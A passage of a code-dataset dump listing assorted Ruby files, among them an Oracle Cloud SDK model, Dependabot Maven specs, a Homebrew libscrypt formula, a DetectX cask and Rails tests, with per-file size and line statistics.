hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e9aefe9e3b59c529c8936236ea94e7b078802d86 | 6,437 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# The shape used to launch instances associated with the dedicated VM host.
#
class Core::Models::DedicatedVmHostInstanceShapeSummary
# The shape's availability domain.
#
# @return [String]
attr_accessor :availability_domain
# **[Required]** The name of the virtual machine instance shapes that can be launched on a dedicated VM host.
#
# @return [String]
attr_accessor :instance_shape_name
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'availability_domain': :'availabilityDomain',
'instance_shape_name': :'instanceShapeName'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'availability_domain': :'String',
'instance_shape_name': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :availability_domain The value to assign to the {#availability_domain} property
# @option attributes [String] :instance_shape_name The value to assign to the {#instance_shape_name} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.availability_domain = attributes[:'availabilityDomain'] if attributes[:'availabilityDomain']
raise 'You cannot provide both :availabilityDomain and :availability_domain' if attributes.key?(:'availabilityDomain') && attributes.key?(:'availability_domain')
self.availability_domain = attributes[:'availability_domain'] if attributes[:'availability_domain']
self.instance_shape_name = attributes[:'instanceShapeName'] if attributes[:'instanceShapeName']
raise 'You cannot provide both :instanceShapeName and :instance_shape_name' if attributes.key?(:'instanceShapeName') && attributes.key?(:'instance_shape_name')
self.instance_shape_name = attributes[:'instance_shape_name'] if attributes[:'instance_shape_name']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
availability_domain == other.availability_domain &&
instance_shape_name == other.instance_shape_name
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[availability_domain, instance_shape_name].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 37.424419 | 245 | 0.689762 |
bf17941eb84e995664d6079087df9b4dd20f0a9b | 987 | # encoding: utf-8
require 'sequel'
module Resque
class BaseJob
MAX_RETRIES = 3
@@queue = ''
@@retries = 0
def self.perform(options = {})
raise NotImplementedError("This class shouldn't be directly instantiated")
end
def self.run_action(options, queue_name, action)
@@queue = queue_name
begin
action.call(options)
rescue Sequel::DatabaseDisconnectError => e
puts "Job got a DatabaseDisconnectError: #{e.message}"
regexps = [ /server has gone away/, /decryption failed or bad record mac/, /SSL SYSCALL error: EOF detected/ ]
match_found = regexps.map { |regexp| regexp.match(e.message) }.any? { |matches| matches }
if (match_found)
@@retries += 1
if (@@retries < MAX_RETRIES)
puts 'Retrying job'
retry
else
raise e
end
else
raise e
end
end
end #self.perform
end #BaseJobs
end | 24.073171 | 118 | 0.5846 |
6aefa7d38b6526a94a223b3c181f0ac5392ff60e | 264 | module SocialStream
module Events
module Models
module Actor
extend ActiveSupport::Concern
included do
has_many :rooms
end
def events
Event.authored_by(self)
end
end
end
end
end
| 14.666667 | 37 | 0.564394 |
e9e178ffdbe4326965fcb06bb96a8fa6a88d25cb | 278 | #!/usr/bin/env ruby
# by Andronik Ordian
def optimal_weight(w, weights)
result = 0
weights.each { |weight| result += weight if result + weight <= w }
result
end
if __FILE__ == $0
w, _, *weights = STDIN.read.split().map(&:to_i)
puts optimal_weight(w, weights)
end
| 18.533333 | 68 | 0.661871 |
3841f54222b2ca7defd6d67c28277724f62d6b9d | 2,561 | # rubocop:disable all
require 'flows'
require 'dry/transaction'
require 'trailblazer/operation'
#
# Task: a + b = ?
#
class FlowsSummator
include Flows::Operation
step :sum
ok_shape :sum
def sum(a:, b:, **)
ok(sum: a + b)
end
end
class POROSummator
def self.call(a:, b:)
a + b
end
end
class DrySummator
include Dry::Transaction
step :sum
private
def sum(a:, b:)
Success(a + b)
end
end
class TBSummator < Trailblazer::Operation
step :sum
def sum(opts, a:, b:, **)
opts[:sum] = a + b
end
end
#
# Task: 10 steps which returs simple value
#
class FlowsTenSteps
include Flows::Operation
step :s1
step :s2
step :s3
step :s4
step :s5
step :s6
step :s7
step :s8
step :s9
step :s10
ok_shape :data
def s1(**); ok(s1: true); end
def s2(**); ok(s2: true); end
def s3(**); ok(s3: true); end
def s4(**); ok(s4: true); end
def s5(**); ok(s5: true); end
def s5(**); ok(s5: true); end
def s6(**); ok(s6: true); end
def s7(**); ok(s7: true); end
def s8(**); ok(s8: true); end
def s9(**); ok(s9: true); end
def s10(**); ok(data: :ok); end
end
class POROTenSteps
class << self
def call()
s1
s2
s3
s4
s5
s6
s7
s8
s9
s10
end
def s1; true; end
def s2; true; end
def s3; true; end
def s4; true; end
def s5; true; end
def s6; true; end
def s7; true; end
def s8; true; end
def s9; true; end
def s10; true; end
end
end
class DryTenSteps
include Dry::Transaction
step :s1
step :s2
step :s3
step :s4
step :s5
step :s6
step :s7
step :s8
step :s9
step :s10
private
def s1; Success(true); end
def s2; Success(true); end
def s3; Success(true); end
def s4; Success(true); end
def s5; Success(true); end
def s6; Success(true); end
def s7; Success(true); end
def s8; Success(true); end
def s9; Success(true); end
def s10; Success(true); end
end
class TBTenSteps < Trailblazer::Operation
step :s1
step :s2
step :s3
step :s4
step :s5
step :s6
step :s7
step :s8
step :s9
step :s10
def s1(opts, **); opts[:s1] = true; end
def s2(opts, **); opts[:s2] = true; end
def s3(opts, **); opts[:s3] = true; end
def s4(opts, **); opts[:s4] = true; end
def s5(opts, **); opts[:s5] = true; end
def s6(opts, **); opts[:s6] = true; end
def s7(opts, **); opts[:s7] = true; end
def s8(opts, **); opts[:s8] = true; end
def s9(opts, **); opts[:s9] = true; end
def s10(opts, **); opts[:s10] = true; end
end
| 16.00625 | 43 | 0.574385 |
ff13942d5527ee0e3cd51ef4b8028e04d661ee57 | 99 | module Reviewit
autoload :App, 'reviewit/app.rb'
autoload :GitUtil, 'reviewit/git_util.rb'
end
| 19.8 | 43 | 0.747475 |
1171f32bb104b933ff139b70c7f5905f9d0364b9 | 14,272 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/maven/file_updater/declaration_finder"
RSpec.describe Dependabot::Maven::FileUpdater::DeclarationFinder do
let(:finder) do
described_class.new(
dependency: dependency,
declaring_requirement: declaring_requirement,
dependency_files: dependency_files
)
end
let(:dependency) do
Dependabot::Dependency.new(
name: dependency_name,
version: dependency_version,
requirements: [declaring_requirement],
package_manager: "maven"
)
end
let(:dependency_name) { "org.apache.httpcomponents:httpclient" }
let(:dependency_version) { "4.5.3" }
let(:dependency_metadata) { { packaging_type: "jar" } }
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "pom.xml",
groups: [],
source: nil,
metadata: dependency_metadata
}
end
let(:dependency_files) { [pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", pom_fixture_name)
)
end
let(:pom_fixture_name) { "basic_pom.xml" }
describe "#declaration_nodes" do
subject(:declaration_nodes) { finder.declaration_nodes }
context "with a dependency in the dependencies node" do
let(:pom_fixture_name) { "basic_pom.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("4.5.3")
expect(declaration_node.at_css("artifactId").content).
to eq("httpclient")
expect(declaration_node.at_css("groupId").content).
to eq("org.apache.httpcomponents")
end
end
context "with a dependency in the dependency management node" do
let(:pom_fixture_name) { "dependency_management_pom.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("4.5.3")
expect(declaration_node.at_css("artifactId").content).
to eq("httpclient")
expect(declaration_node.at_css("groupId").content).
to eq("org.apache.httpcomponents")
end
end
context "with a dependency in the parent node" do
let(:pom_fixture_name) { "pom_with_parent.xml" }
let(:dependency_name) do
"org.springframework.boot:spring-boot-starter-parent"
end
let(:dependency_version) { "1.5.9.RELEASE" }
let(:dependency_metadata) { { packaging_type: "pom" } }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("1.5.9.RELEASE")
expect(declaration_node.at_css("artifactId").content).
to eq("spring-boot-starter-parent")
expect(declaration_node.at_css("groupId").content).
to eq("org.springframework.boot")
end
end
context "with a dependency in the plugins node" do
let(:pom_fixture_name) { "plugin_dependencies_pom.xml" }
let(:dependency_name) { "org.jacoco:jacoco-maven-plugin" }
let(:dependency_version) { "0.7.9" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("0.7.9")
expect(declaration_node.at_css("artifactId").content).
to eq("jacoco-maven-plugin")
expect(declaration_node.at_css("groupId").content).to eq("org.jacoco")
end
context "missing a groupId" do
let(:pom_fixture_name) { "plugin_dependencies_missing_group_id.xml" }
let(:dependency_name) do
"org.apache.maven.plugins:spring-boot-maven-plugin"
end
let(:dependency_version) { "1.5.8.RELEASE" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("1.5.8.RELEASE")
expect(declaration_node.at_css("artifactId").content).
to eq("spring-boot-maven-plugin")
expect(declaration_node.at_css("groupId")).to be_nil
end
end
end
context "with a dependency in the extensions node" do
let(:pom_fixture_name) { "extension_dependencies_pom.xml" }
let(:dependency_name) { "org.jacoco:jacoco-maven-extension" }
let(:dependency_version) { "0.7.9" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("0.7.9")
expect(declaration_node.at_css("artifactId").content).
to eq("jacoco-maven-extension")
expect(declaration_node.at_css("groupId").content).to eq("org.jacoco")
end
end
context "with a dependency in the pluginManagement node" do
let(:pom_fixture_name) { "plugin_management_dependencies_pom.xml" }
let(:dependency_name) { "org.jacoco:jacoco-maven-plugin" }
let(:dependency_version) { "0.7.9" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("0.7.9")
expect(declaration_node.at_css("artifactId").content).
to eq("jacoco-maven-plugin")
expect(declaration_node.at_css("groupId").content).to eq("org.jacoco")
end
end
context "with a nested dependency" do
let(:pom_fixture_name) { "nested_dependency_pom.xml" }
let(:dependency_name) { "com.puppycrawl.tools:checkstyle" }
let(:dependency_version) { "8.2" }
let(:dependency_metadata) do
{ property_name: "checkstyle.version", packaging_type: "jar" }
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("${checkstyle.version}")
expect(declaration_node.at_css("artifactId").content).
to eq("checkstyle")
expect(declaration_node.at_css("groupId").content).
to eq("com.puppycrawl.tools")
end
end
context "with a plugin within a plugin" do
let(:pom_fixture_name) { "plugin_within_plugin.xml" }
let(:dependency_name) { "jp.skypencil.findbugs.slf4j:bug-pattern" }
let(:dependency_version) { "1.4.0" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("1.4.0")
expect(declaration_node.at_css("artifactId").content).
to eq("bug-pattern")
expect(declaration_node.at_css("groupId").content).
to eq("jp.skypencil.findbugs.slf4j")
end
end
context "with a repeated dependency" do
let(:pom_fixture_name) { "repeated_pom_same_version.xml" }
let(:dependency_name) { "org.apache.maven.plugins:maven-javadoc-plugin" }
let(:dependency_version) { "2.10.4" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("2.10.4")
expect(declaration_node.at_css("artifactId").content).
to eq("maven-javadoc-plugin")
expect(declaration_node.at_css("groupId").content).
to eq("org.apache.maven.plugins")
end
context "where the versions are identical" do
let(:pom_fixture_name) { "repeated_pom_identical.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(2)
expect(declaration_nodes.first.to_s).to include("dependency")
expect(declaration_nodes.last.to_s).to include("plugin")
expect(declaration_nodes.first).to be_a(Nokogiri::XML::Node)
expect(declaration_nodes.first.at_css("version").content).
to eq("2.10.4")
expect(declaration_nodes.first.at_css("artifactId").content).
to eq("maven-javadoc-plugin")
expect(declaration_nodes.first.at_css("groupId").content).
to eq("org.apache.maven.plugins")
end
context "but differ by distribution type" do
let(:pom_fixture_name) { "repeated_pom_multiple_types.xml" }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
expect(declaration_nodes.first).to be_a(Nokogiri::XML::Node)
expect(declaration_nodes.first.at_css("type")).to be_nil
end
context "looking for the bespoke type" do
let(:dependency_metadata) { { packaging_type: "test-jar" } }
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
expect(declaration_nodes.first).to be_a(Nokogiri::XML::Node)
expect(declaration_nodes.first.at_css("type").content).
to eq("test-jar")
end
end
end
end
end
context "with a groupId property" do
let(:dependency_files) { [pom, child_pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", "sigtran.pom")
)
end
let(:child_pom) do
Dependabot::DependencyFile.new(
name: "map/pom.xml",
content: fixture("poms", "sigtran-map.pom")
)
end
let(:dependency_name) { "uk.me.lwood.sigtran:sigtran-tcap" }
let(:dependency_version) { "0.9-SNAPSHOT" }
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "map/pom.xml",
groups: [],
source: nil,
metadata: { property_name: "project.version", packaging_type: "jar" }
}
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("${project.version}")
expect(declaration_node.at_css("artifactId").content).
to eq("sigtran-tcap")
expect(declaration_node.at_css("groupId").content).
to eq("${project.groupId}")
end
context "that is missing for an unrelated dependency" do
let(:dependency_files) { [pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", "missing_property_group_id.xml")
)
end
let(:dependency_name) { "io.reactivex.rxjava2:rxjava" }
let(:dependency_version) { "2.1.6" }
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "pom.xml",
groups: [],
source: nil,
metadata: { packaging_type: "jar" }
}
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).to eq("2.1.6")
expect(declaration_node.at_css("artifactId").content).to eq("rxjava")
expect(declaration_node.at_css("groupId").content).
to eq("io.reactivex.rxjava2")
end
end
end
context "with an inherited property" do
let(:dependency_files) { [pom, child_pom, grandchild_pom] }
let(:pom) do
Dependabot::DependencyFile.new(
name: "pom.xml",
content: fixture("poms", "multimodule_pom.xml")
)
end
let(:child_pom) do
Dependabot::DependencyFile.new(
name: "legacy/pom.xml",
content: fixture("poms", "legacy_pom.xml")
)
end
let(:grandchild_pom) do
Dependabot::DependencyFile.new(
name: "legacy/some-spring-project/pom.xml",
content: fixture("poms", "some_spring_project_pom.xml")
)
end
let(:dependency_name) { "org.springframework:spring-aop" }
let(:dependency_version) { "2.5.6" }
let(:dependency_metadata) do
{ property_name: "spring.version", packaging_type: "jar" }
end
let(:declaring_requirement) do
{
requirement: dependency_version,
file: "legacy/some-spring-project/pom.xml",
groups: [],
source: nil,
metadata: dependency_metadata
}
end
it "finds the declaration" do
expect(declaration_nodes.count).to eq(1)
declaration_node = declaration_nodes.first
expect(declaration_node).to be_a(Nokogiri::XML::Node)
expect(declaration_node.at_css("version").content).
to eq("${spring.version}")
expect(declaration_node.at_css("artifactId").content).
to eq("spring-aop")
expect(declaration_node.at_css("groupId").content).
to eq("org.springframework")
end
end
end
end
| 35.859296 | 79 | 0.6353 |
f7b25e7a87156669d3265efcb4482a6cd85f6b5b | 1,785 | require 'test_helper'
class AgentsIndexTest < ActionDispatch::IntegrationTest
def setup
@admin = agents(:michael)
@agent = agents(:archer)
end
test "index as admin including pagination with edit and delete links and a button to add a new agent" do
log_in_as(@admin)
get agents_path
assert_template 'agents/index'
# Only an admin can add a new agent
assert_select 'form[action=?]', new_agent_path, text: "Add a new agent", count: 1
assert_select 'div.pagination'
first_page_of_agents = Agent.paginate(page: 1)
first_page_of_agents.each do |agent|
assert_select 'a[href=?]', agent_path(agent), text: agent.name
unless agent == @admin
assert_select 'a[href=?][data-method="delete"]', agent_path(agent), method: :delete, count: 1
end
assert_select 'a[href=?]', edit_agent_path(agent), method: :edit
end
assert_difference 'Agent.count', -1 do
delete agent_path(@agent)
end
end
test "index as non-admin" do
log_in_as(@agent)
get agents_path
assert_template 'agents/index'
# Only an admin can add a new agent
assert_select 'form[action=?]', new_agent_path, text: "Add a new agent", count: 0
assert_select 'div.pagination'
first_page_of_agents = Agent.paginate(page: 1)
first_page_of_agents.each do |agent|
assert_select 'a[href=?][data-method="delete"]', agent_path(agent), count: 0
# An agent can edit his own profile
if agent == @agent
# There are two edit links: one to the left of the agent link and one
# under the Account dropdown menu
assert_select 'a[href=?]', edit_agent_path(agent), count: 2
else
assert_select 'a[href=?]', edit_agent_path(agent), count: 0
end
end
end
end
| 33.055556 | 106 | 0.673389 |
218c11552175a0bcb10ec01411c487433fc70a56 | 973 | module MoneyS3
module Parsers
class VyrobniCislo
include ParserCore::BaseParser
def vyrobni_cis
at 'VyrobniCis'
end
def vyrobni_cis_attributes
attributes_at 'VyrobniCis'
end
def dat_vyr
at 'DatVyr'
end
def dat_vyr_attributes
attributes_at 'DatVyr'
end
def car_kod
at 'CarKod'
end
def car_kod_attributes
attributes_at 'CarKod'
end
def to_h
hash = {}
hash[:attributes] = attributes
hash[:vyrobni_cis] = vyrobni_cis if has? 'VyrobniCis'
hash[:vyrobni_cis_attributes] = vyrobni_cis_attributes if has? 'VyrobniCis'
hash[:dat_vyr] = dat_vyr if has? 'DatVyr'
hash[:dat_vyr_attributes] = dat_vyr_attributes if has? 'DatVyr'
hash[:car_kod] = car_kod if has? 'CarKod'
hash[:car_kod_attributes] = car_kod_attributes if has? 'CarKod'
hash
end
end
end
end | 21.622222 | 83 | 0.609455 |
03c107141c507c18cc5c42ab02e35f960354e2be | 401 | # encoding: UTF-8
# frozen_string_literal: true
module BlockchainClient
class Xano < Bitcoin
def get_block(block_hash)
json_rpc(:getblock, [block_hash, true]).fetch('result')
end
def get_raw_transaction(txid)
json_rpc(:getrawtransaction, [txid, 1]).fetch('result')
end
def get_unconfirmed_txns
json_rpc(:getrawmempool).fetch('result')
end
end
end
| 20.05 | 61 | 0.685786 |
bb822ab91b491c40776ff4c822a0dff2696908c6 | 1,329 | require 'terjira/utils/file_cache'
module Terjira
VERSION = '0.4.1'.freeze
class VersionChecker
VERSION_CHECK_DURATION = (60 * 60 * 24 * 5).freeze
class << self
def check_version
version_alert_cache.fetch :alert do
if new_version_exists?
puts "* New version of terjira was released! Run `gem update terjira` if you want to update"
end
'checked!'
end
end
def new_version_exists?
current = Terjira::VERSION.split(".").map(&:to_i)
remote = parse_remote_version
(current[0] < remote[0]) ||
((current[0] == remote[0]) && (current[1] < remote[1])) ||
((current[0] == remote[0]) && (current[1] == remote[1]) && (current[2] < remote[2]))
rescue => e
puts "Can not check new version of terjira, #{e.message}"
false
end
private
def parse_remote_version
remote_version = search_remote_version
(remote_version.scan(/(?<=terjira\s\()\d+\.\d+\.\d+/).first || '0.0.0').split(".").map(&:to_i)
end
def search_remote_version
@remote_version_str ||= `gem search terjira`
end
def version_alert_cache
@version_alert_cache ||= Terjira::FileCache.new("version", VERSION_CHECK_DURATION)
end
end
end
end
| 27.122449 | 104 | 0.586907 |
39b681175c83b338886f7a758d3d4538128d87b4 | 2,071 | class Libscrypt < Formula
desc "Library for scrypt"
homepage "https://lolware.net/libscrypt.html"
url "https://github.com/technion/libscrypt/archive/v1.21.tar.gz"
sha256 "68e377e79745c10d489b759b970e52d819dbb80dd8ca61f8c975185df3f457d3"
license "BSD-2-Clause"
bottle do
sha256 cellar: :any, arm64_big_sur: "1073aa38a72ed089bf6e6a6a4fbddb6e6123b394e7562d1e1ad5b26cc67906dd"
sha256 cellar: :any, big_sur: "c2c67b09b54467e47709dbe7340c1916e0802a5423b4f2224156ce7bb977e389"
sha256 cellar: :any, catalina: "66ea017c5361346903add978ce85b09a2a6f2e8eabdf9fb2cfb58809da1d29cd"
sha256 cellar: :any, mojave: "81c603f27fbda0bde330506d2745f62d3ba16d3290addc5f1eeecbcd110aa801"
sha256 cellar: :any, high_sierra: "46cf17f2a05e5e418822a306899de14be3fbdfe71fc017f6eb1169fc3ad1de3a"
sha256 cellar: :any, sierra: "3adc43863f9b966dcecd89f507a4706891f94129dd88ba810ed0269278e931cf"
sha256 cellar: :any, el_capitan: "bc2c8318384a72f82802937f7e6dd8017ec44fb6fc94583e5f0c38056e1a660c"
sha256 cellar: :any, yosemite: "0e870b01dbbfc49432cc8ea81c90ee6d8732b6d8adc4665368844536d5c6e092"
sha256 cellar: :any, mavericks: "fe3bc1ca8b19e7c86e103f1345cb9294da01cc15b950302ad5486ef49b2b212d"
sha256 cellar: :any, x86_64_linux: "b02209e5c778dcfdd9e13123d9ce258f909f583ce5e0b474d916bb4ea1c48293"
end
def install
if OS.mac?
system "make", "install-osx", "PREFIX=#{prefix}", "LDFLAGS=", "CFLAGS_EXTRA="
system "make", "check", "LDFLAGS=", "CFLAGS_EXTRA="
else
system "make"
system "make", "check"
lib.install "libscrypt.a", "libscrypt.so", "libscrypt.so.0"
include.install "libscrypt.h"
prefix.install "libscrypt.version"
end
end
test do
(testpath/"test.c").write <<~EOS
#include <libscrypt.h>
int main(void) {
char buf[SCRYPT_MCF_LEN];
libscrypt_hash(buf, "Hello, Homebrew!", SCRYPT_N, SCRYPT_r, SCRYPT_p);
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lscrypt", "-o", "test"
system "./test"
end
end
| 45.021739 | 106 | 0.733462 |
87c4d264c2f9af078eafbd6e83558745ee3ae309 | 877 | require 'test_helper'
module Rubybear
class StreamTest < Rubybear::Test
def setup
@api = Rubybear::Stream.new
end
def test_method_missing
assert_raises NoMethodError do
@api.bogus
end
end
def test_all_respond_to
@api.method_names.each do |key|
assert @api.respond_to?(key), "expect rpc respond to #{key}"
end
end
def test_all_methods
skip "cannot execute an asynchronous request in tests"
vcr_cassette('all_methods') do
@api.method_names.each do |key|
assert @api.send key
end
end
end
def test_get_operations
skip "cannot execute an asynchronous request in tests"
vcr_cassette('get_operations') do
@api.operations
assert_equal Hashie::Mash, response.class, response.inspect
end
end
end
end
| 21.390244 | 68 | 0.63512 |
285c2b03cfae5afccdafcf7d506934d683fb917e | 1,348 | $LOAD_PATH.push File.expand_path('../lib', __FILE__)
# Maintain your gem's version:
require 'care_bert/version'
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'care_bert'
s.version = CareBert::VERSION
s.authors = ['Daniel Loy']
s.email = ['[email protected]']
s.homepage = 'https://github.com/loybert/care_bert'
s.summary = 'CareBert takes care of the validation state of your current database items'
s.description = 'CareBert analyzes the current items of your database and performs differing validation and integrity tests. Currently it supports following checks: \n - Table Integrity => check each single model-instance of all available tables can be loaded \n - Model Validation => triggers the validation of each single model-instance (which results might have changed due code-modifications) \n - Missing Assocs => tries to load each instance of an assoc, if the foreign_key is set (having a present FK doesn\'t mean it really has the targeted model available)'
s.license = 'MIT'
s.files = Dir['{app,config,db,lib}/**/*', 'MIT-LICENSE', 'Rakefile', 'README.md']
s.require_paths = ['lib']
s.test_files = Dir['test/**/*']
s.add_dependency 'rails', '~> 3'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'rubocop'
end
| 51.846154 | 568 | 0.719585 |
e23dbcae753b2c754315f82d340c25a30f858035 | 754 | # frozen_string_literal: true
class Zendesk2::Search
include Zendesk2::Request
request_method :get
request_body { |r| { query: r.query } }
request_path { |_| '/search.json' }
page_params!
attr_reader :query
def call(query, params)
@query = query
super(params)
end
def mock
terms = Hash[query.split(' ').map { |t| t.split(':') }]
type = terms.delete('type')
collection = if type.nil?
cistern.data.values
else
cistern.data[pluralize(type).to_sym]
end
results = collection.values.select { |v| terms.all? { |term, condition| v[term].to_s == condition.to_s } }
page(results, params: { 'query' => query }, root: 'results')
end
end
| 22.848485 | 110 | 0.588859 |
187d3de20e33e33991ab85551c44901b514d9349 | 157 | class AddPasswordSaltToUsers < ActiveRecord::Migration
def change
add_column :users, :password_salt, :string, :null => false, :default => ''
end
end
| 26.166667 | 78 | 0.719745 |
e9e9a21b90dc742feed28c3e86d868514fa18b32 | 852 | cask 'detectx' do
version '2.73'
sha256 '9422a1cffd1c3ea7786c80cd767a373983ad788fc4aa5138e69c15163a79df7a'
# amazonaws.com/sqwarq.com was verified as official when first introduced to the cask
url 'https://s3.amazonaws.com/sqwarq.com/PublicZips/DetectX.app.zip'
appcast 'https://s3.amazonaws.com/sqwarq.com/AppCasts/detectx.xml',
checkpoint: 'bcec948fa366840877cdb2d52b5016404642f04f92e5f6a18ff189ea020baafb'
name 'DetectX'
homepage 'https://sqwarq.com/detectx/'
auto_updates true
app 'DetectX.app'
zap delete: [
'~/Library/Application Support/com.sqwarq.DetectX',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.sqwarq.detectx.sfl',
'~/Library/Preferences/com.sqwarq.DetectX.plist',
]
end
| 38.727273 | 150 | 0.728873 |
79c762f230069547a2417e068fcc856882e2ef27 | 6,068 | # http://linux.die.net/man/5/rackspace_yum.conf
case node['platform_version'].to_i
when 5
default['rackspace_yum']['main']['cachedir'] = '/var/cache/yum'
else
default['rackspace_yum']['main']['cachedir'] = '/var/cache/yum/$basearch/$releasever'
end
default['rackspace_yum']['main']['cookbook_template_globalconfig'] = 'rackspace_yum'
default['rackspace_yum']['main']['cookbook_template_repository'] = 'rackspace_yum'
default['rackspace_yum']['main']['distroverpkg'] = "#{node['platform']}-release"
